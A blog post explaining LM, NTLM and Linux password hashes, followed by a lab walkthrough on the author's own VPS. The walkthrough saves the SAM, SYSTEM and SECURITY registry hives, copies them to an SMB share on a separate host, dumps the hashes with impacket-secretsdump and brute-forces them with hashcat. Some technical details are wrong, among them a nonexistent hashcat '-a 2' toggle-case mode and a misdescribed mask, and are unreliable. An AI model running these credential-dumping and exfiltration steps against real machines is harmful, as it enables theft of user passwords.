Unraveling Windows and Linux Password Hashes: LM vs. NTLM vs. Linux

The last time I discussed password hashes, it was more focused on Linux and the password cracking program John the Ripper. I wanted to focus another post on Windows hashes and using the other popular password cracker Hashcat. When it comes to securing user passwords on Windows and Linux systems, understanding the fundamentals of password hashes is crucial. In this blog post, we'll delve into what Windows and Linux hashes are, how they are generated, and why NTLM (New Technology LAN Manager) has replaced the vulnerable LM (LAN Manager) hashes in modern Windows systems. We'll also explore the differences between Linux and Windows hashes and where they are stored.

What Are Windows Password Hashes?

If you've read my previous post, you'll know the answer to this question. If you're just now joining us at Savage Hack, a password hash is a cryptographic representation of a user's password. Instead of storing the plaintext password, Windows systems store a hash of the password, making it more secure. When a user logs in, their entered password is hashed, and the resulting hash is compared to the stored hash. If they match, access is granted.

Windows Password Hashes: LM vs. NTLM

In older versions of Windows (Windows NT and earlier), LM hashes were used to store user passwords. LM hashes had significant vulnerabilities:

1. Case Insensitivity: LM hashes were not case-sensitive, meaning that 'password' and 'Password' generated the same hash. The reasoning behind this was because the users ASCII password was converted to all UPPERCASE. So if your password was 'password1' it would convert it to PASSWORD1 before hashing. This greatly reduced the amount of time and resources needed by cutting out almost half the of the characters that could have been used for a password. (e.g. abcdefghijklmnopqrstuvwxyz would not be used while trying to crack the passwords).

2. Fixed Length: LM hashes always had a fixed length of 14 characters and 16 bytes by included DES key to the password, making them susceptible to brute force attacks. If a password was under 14 characters, padding, which is just null bytes would be added to the end of the password before hashing, which would make it exactly 14 characters every time. Attackers knew that every LM hash would be 14 characters, and they could focus their efforts accordingly. I will also demonstrate a fixed length password attack later and showing how if an attacker knows the specific parameters for a password/hash, they can crack the passwords much faster.

3. Limited Character Set: LM hashes only supported a limited character set (uppercase letters, numbers, and some special characters). This reduced the potential password complexity.

4. Two-Part Hash: LM hashes split the password into two 7-character parts. It would add "padding" to the password that was under 14 characters long to make it exactly 14 characters every time. LM would not store passwords over 14 characters long.  It would then split up the password into two 7-character parts, use each part as a DES key to encrypt a constant of KGS!@@#$% and then concatenate those two parts together for the 16 byte hash. Here is a diagram I took from redforce.io of how the users password of "PassWord" would be hashed using LM.

CREDIT: http://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/
1 – All characters will be converted to upper case
PassWord -> PASSWORD
2 – In case the password’s length is less than 14 characters it will be padded with null characters, so its length becomes 14, so the result will be PASSWORD000000
3 – These 14 characters will be split into 2 halves
PASSWOR
D000000
4 – Each half is converted to bits, and after every 7 bits, a parity bit (0) will be added, so the result would be a 64 bits key.
1101000011 -> 11010000011
As a result, we will get two keys from the 2 pre-generated halves after adding these parity bits
5 – Each of these keys is then used to encrypt the string “KGS!@#$%” using DES algorithm in ECB mode so that the result would be
PASSWOR       = E52CAC67419A9A22
D000000        = 4A3B108F3FA6CB6D
6 – The output of the two halves is then combined, and that makes out LM hash
E52CAC67419A9A224A3B108F3FA6CB6D

To address these vulnerabilities, Microsoft introduced NTLM hashes. NTLM hashes offer significant improvements:

1. Case Sensitivity: NTLM hashes are case-sensitive, which significantly increases password complexity and security. 'password' and 'Password' will generate different NTLM hashes.

2. Longer Hashes: NTLM hashes are longer, typically 32 characters, further increasing complexity and making brute force attacks more challenging.

3. Expanded Character Set: NTLM hashes support a broader character set, including uppercase and lowercase letters, numbers, and various special characters, enhancing password strength.

4. Single Hash: Unlike LM hashes, NTLM hashes are a single hash of the entire password, eliminating the vulnerability of splitting passwords into two parts.

No Salting in LM and NTLM Hashes

One crucial aspect to understand about LM (LAN Manager) and NTLM (New Technology LAN Manager) hashes is that they do not utilize the concept of "salt." Salt is random data added to the password before hashing to make each hashed password unique, even if the original passwords are the same. This added layer of security complicates rainbow table attacks by ensuring that identical passwords result in different hashes.

However, LM and NTLM hashes do not employ salt. This means that identical passwords will always produce the same hash, making them more vulnerable to precomputed attacks, such as rainbow tables. Security measures have evolved to address this limitation, including the move to more robust hashing algorithms and the use of salting in modern authentication systems.

Linux Password Hashes: A Different Beast

Linux systems use a different approach to password storage. Instead of LM or NTLM hashes, Linux uses one-way cryptographic hashes like SHA-512. These hashes are significantly more secure and resistant to brute force attacks.

Differences Between Linux and Windows Hashes:

1. Hashing Algorithm: Windows uses LM or NTLM hashes, while Linux typically employs stronger hashing algorithms like SHA-512.

2. Case Sensitivity: Linux hashes are case-sensitive, which means 'password' and 'Password' generate different hashes.

3. Hash Length: Linux hashes are longer, generally 86 characters for SHA-512, making them extremely secure.

Where Are These Hashes Stored?

In Windows, password hashes are stored in the Security Account Manager (SAM) database or the Active Directory database, depending on the system's configuration.

In Linux, password hashes are typically stored in the "/etc/shadow" file. The "/etc/passwd" file may contain a placeholder (an 'x') to indicate that the hash is stored in "/etc/shadow."

Demonstration

For this demonstration I used a VPS running Windows 10. I ran a startup script for this VPS to create 6 users, all with weak passwords with fix lengths to six characters. I did not know the passwords at all as it was randomly generated at time of the creation of this VPS instance. I did 6 characters for time sake, but could have set the length higher if I wanted the practice. I also used my GPU on my host machine instead of using the Kali VPS I had created. The VPS did not have a GPU on the instance, so it would have been using CPU power, which would have taken hours. Currently in the process of seeing if Linode will allow me to use an instance with a GPU. If not, I completely understand their reasoning, at least I can still do this from my own machine. The following code is actually PowerShell.

# Function to generate a random weak password
function Generate-WeakPassword {
    $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    $password = ""
    $length = 8  # Adjust the password length as needed
    for ($i = 0; $i -lt $length; $i++) {
        $randomIndex = Get-Random -Minimum 0 -Maximum $characters.Length
        $password += $characters[$randomIndex]
    }
    return $password
}
# Create users with weak passwords
Write-Host "Creating users with weak passwords..."
# Define an array of usernames
$usernames = @("John", "Joe", "Jenny", "Jason", "Jerry", "Jack")
foreach ($username in $usernames) {
    $password = Generate-WeakPassword
    $securePassword = ConvertTo-SecureString -String $password -AsPlainText -Force
    New-LocalUser -Name $username -Password $securePassword -FullName $username -Description "User for demonstration purposes"
    Write-Host "User $username created with password: $password"
}
Write-Host "Users created with weak passwords."

Once the machine was booted up, I RPD'd in as "admin" and checked to make sure that the accounts were in fact created.

As you can see, it did create all of the accounts we told it to in the script. From this point I just simulated that I had successfully exploited the Windows 10 machine and had performed priv esc to the admin account (not be confused with the administrator account) and was looking to extract password hashes for cracking for possible password reuse and lateral movement in the network. Since I had obtained an account with administrator privileges, I could have done this in a few ways. I thought about just bringing mimikatz over to the machine and running it to dump the hashes, which I very well could have done. But the thing with mimikatz, it doesn't have all of the username and hashes lined up all pretty and ready for cracking. I've said it before, I'm lazy. So I went with the route of cloning the SAM, System, and security files and moved them to my kali VPS. I ran the following commands to copy the files to my current folder.

reg save HKLMsam sam
reg save HKLMsystem system
reg save HKLMsecurity security

Then I set up an SMB server on the Kali VPS using impacket-smbserver.

impacket-smbserver share $(pwd) -smb2support

Once this was up and running, I simply copied the cloned files to the Kali VPS.

copy sam \194.195.214.127share
copy system \194.195.214.127share
copy security \194.195.214.127share

Now that I had the files on my Kali VPS, I needed to extract the information from them. I tried using an old tool on Kali called samdump2 which would dump the hashes from the sam file.

If you're familiar with Windows hashes, you will know that something is not right here. If you're not familiar with windows hashes... you will know that something is not right here. All of the hashes extracted are the same! This means that all the passwords are the same! Joking, it's missing one of the crucial elements that samdump2 doesn't have available as an option which is the security file. Samdump2 retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM files. This is Windows 10, which is an entirely different kernel. So what we need to use is a tool from impacket called secretsdump.

impacket-secretsdump -sam sam -system system -security security local

Running this command gave us completely different results than samdump2. We now have unique hashes that we can get to cracking!

I simply copied those hashes and pasted them into a txt file named windows.txt on my host machine since my host machine has a GPU I can use and the VPS does not. What will take a CPU hours to crack, a GPU takes a matter of seconds.

HASHCAT

Hashcat has so many functions available to it, that I could go on for hours on this topic. Instead, I will do a brief overview on how to use hashcat and some features.

Features of Hashcat

a. Multi-Algo Support:

Hashcat supports over 200 different hashing algorithms, including the popular ones like MD5, SHA-1, and WPA.

b. Multi-OS & Multi-Platform:

Whether you’re on Windows, Linux, or MacOS, Hashcat has got you covered. Plus, it’s optimized for all modern CPUs and GPUs, making it versatile and accessible.

c. Performance Tuning:

Hashcat can auto-tune itself for optimal performance based on your system's hardware.

d. Attacks:

Hashcat supports a myriad of attack modes including:

• Straight

• Combination

• Brute-force

• Rule-based

• Hybrid attacks, and more.

e. Session Management:

Interrupt and resume sessions without losing progress. A handy feature for those extensive cracking sessions.

f. Free & Open Source:

Being open-source means you can look at the code, contribute, and customize it to your needs.

3. Using Hashcat's Features

a. Basic Password Cracking:

To crack a hash with Hashcat, the basic command structure is:

hashcat -m [hash type] -a [attack mode] [hash file] [wordlist]

For example, to crack an MD5 hash using a brute-force attack, you’d use:

hashcat -m 0 -a 3 hash.txt

b. Rule Based Attacks

You can use rule-based attacks to modify wordlist input. This can be done using:

hashcat -m [hash type] -a 0 -r [rule file] [hash file] [wordlist]

c. Using Masks:

Masks allow you to define a specific pattern if you know a portion of the password. For instance:

hashcat -m 0 -a 3 hash.txt ?a?a?l?l

This command would crack a password with the structure of two symbols or numbers followed by two lowercase letters.

d. Session Management:

Start a session with:

hashcat --session=my_session -m 0 -a 3 hash.txt

To pause, press 'p', and to resume:

hashcat --session=my_session --restore

e. Understanding Hashcat's Attack Modes:

Hashcat offers several different attack modes, each tailored to different use-cases and scenarios. The "-a" flag specifies the attack mode:

• -a 0: Straight - This mode uses a wordlist to try and match each entry against the hash until a match is found. It’s essentially a dictionary attack.

• -a 1: Combination - Hashcat will combine entries from two wordlists, creating a new list to attempt to crack the hash.

• -a 2: Toggle-case - This attack will toggle case in the words from the wordlist. It's useful when people capitalize letters in passwords in predictable ways, like "password" becoming "PassWord".

• -a 3: Brute-force - This mode will try all possible combinations of characters. This is where the term "brute-force" comes from, as it's forcefully trying every possible combination until it finds the correct one. You can define patterns or masks to reduce the search space, like specifying certain characters or lengths.

• -a 6: Hybrid Wordlist + Mask - This mode combines a wordlist with a mask. If you know some part of the password, you can guess the rest using a mask.

• -a 7: Hybrid Mask + Wordlist - The opposite of -a 6. The mask comes before the word from the wordlist.

For instance, in our previous example:

hashcat -m 0 -a 3 hash.txt

The "-a 3" indicates that Hashcat will be using a brute-force attack mode to attempt to crack the hashes in hash.txt.

When using the brute-force mode, it's essential to have an idea of the possible length and character set of the password, as trying all combinations of all lengths can be time-consuming. Using masks, as mentioned earlier, can expedite the process by narrowing down the possibilities.

4. Tips for Using Hashcat Effectively:

• Hardware Matters: Hashcat is designed to use the power of your GPU. Modern GPUs can tremendously speed up the cracking process.

• Wordlists: The quality and comprehensiveness of your wordlist can make a significant difference. Diversified wordlists can improve success rates.

• Stay Updated: As with all software, regularly updating Hashcat ensures you have the latest features and security patches.

I took the password hash file "window.txt" and ran Hashcat ensuring to use my GPU as the device. I ran a command Hashcat command specifying NTLM hashes with -m 1000, brute force attack using -a 3 and specified the length of the passwords as we already knew this using ?a?a?a?a?a?a. This indicated the passwords were 6 characters long and could have been numbers, uppercase, lowercase, and special characters. If we wanted to run just numbers it would be ?d instead of ?a. Lowercase characters only would be ?l, uppercase ?u, etc. By specifying the length parameter, we wouldn't waste our resources by trying every combination of single characters through 5 characters. It would start and end at every combination of 6 characters.

hashcat -m 1000 windows.txt -a 3 ?a?a?a?a?a?a

Hashcat immediately went to work by booting up and and running our hashes. After a matter of seconds, Hashcat already found a couple of passwords.

This was really really fast. I'm estimating that with a CPU it would have taken at least 5 hours total for all six of these passwords to be cracked. With the GPU power, I will let you see for yourself just how quickly it occurred.

You can see in the "started and stopped" sections, it took exactly 51 seconds to brute force and crack all six of those passwords. If had hooked this up to a bigger GPU or even multiple GPU's such as my crypto mining rig that I recently sold, it would have been instantly cracked.

As you can see, complicated or random passwords aren't necessarily effective for security without length. Length is a greater priority in this case. I would recommend that when creating a password that if you do not use a password manager with generated passwords to create something that's at least 16 characters at a minimum, recommend more, and a mix of all character types. If you have any questions about hashcat, cracking passwords, password security, etc., please feel free to leave a comment below or message or email me.

-Sam